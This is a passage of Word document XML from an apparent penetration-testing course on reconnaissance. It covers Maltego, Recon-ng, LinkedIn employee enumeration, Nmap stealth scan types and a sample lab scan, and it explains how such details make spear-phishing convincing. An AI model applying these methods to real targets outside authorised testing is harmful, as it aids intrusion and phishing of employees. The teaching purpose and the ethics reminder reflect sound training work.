        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets the domain, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> chooses the data source (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> limits results, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> saves output to a file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7 Maltego Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Maltego</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a graph-based OSINT tool that visually links entities — domains, IPs, emails, people, organisations — using automated queries called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">transforms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each transform pulls from a data source (DNS, WHOIS, search engines) and adds newly found entities as connected nodes, turning scattered data points into a visual relationship map. The free Community Edition limits results per transform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8 LinkedIn OSINT and Employee Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LinkedIn profiles reveal employee names, job titles, department structure and even the technology stack a company uses — useful for building a phishing-simulation target list during an authorised social-engineering assessment. Combine it with dorking when direct search access is limited, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">site:linkedin.com/in "Target Corp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — What an attacker could use for spear-phishing (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">From LinkedIn results an attacker can learn an employee's exact job title, team, manager's name, and recent projects or technologies mentioned in posts. This lets them craft a believable, personalised email — e.g. impersonating IT support about a tool the employee's team is known to use, or a 'from the manager' urgent request — which is far more convincing than a generic phishing email.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Privacy and ethics note</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Only collect information that is already publicly visible, stay strictly inside the agreed scope, and never use OSINT techniques against individuals outside the engagement — even if they appear to be connected to the target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.9 Recon-ng Framework Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recon-ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a web reconnaissance framework, similar in spirit to Metasploit but focused on OSINT. It organises reconnaissance into modules (e.g. a subdomain-brute-force module) inside workspaces that keep each engagement's collected data separate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.10 Active Reconnaissance — Nmap Scan Types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap determines whether a port is open by sending crafted packets and interpreting the response. Different scan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trade off speed, stealth, accuracy and required privilege.</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1267"/>
        <w:gridCol w:w="2242"/>
        <w:gridCol w:w="6237"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>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Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Scan Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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How It Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-sS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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TCP SYN (“half-open”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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Sends only a SYN packet; a SYN/ACK reply means open, RST means closed. Never completes the handshake — fast and comparatively stealthy, but needs raw-socket (root) access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-sT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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TCP Connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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Completes the full three-way handshake through the OS socket API. Slower and more visible in logs, but needs no special privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-sU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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UDP Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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Sends UDP packets and waits for an ICMP “port unreachable” reply to mark a port closed; no reply often means open or filtered. Much slower than TCP scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-sN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-sF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-sX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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Stealth scans (Null, FIN, Xmas)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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Send unusual TCP flag combinations that some firewalls or older systems do not log as a normal connection attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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Aggressive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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Bundles OS detection, version detection, script scanning and traceroute into one flag — thorough, but noisy and slow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-sV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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Version detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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Probes open ports to identify the exact service and version (e.g. Apache 2.4.41), which lets you map it to known CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1267"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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OS fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6237"/>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Studies subtle differences in how the target's TCP/IP stack behaves to guess its operating system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Typical Nmap command and sample (illustrative) output</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -sS -sV -O -p- 192.168.56.102</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PORT     STATE SERVICE     VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">21/tcp   open  ftp         vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
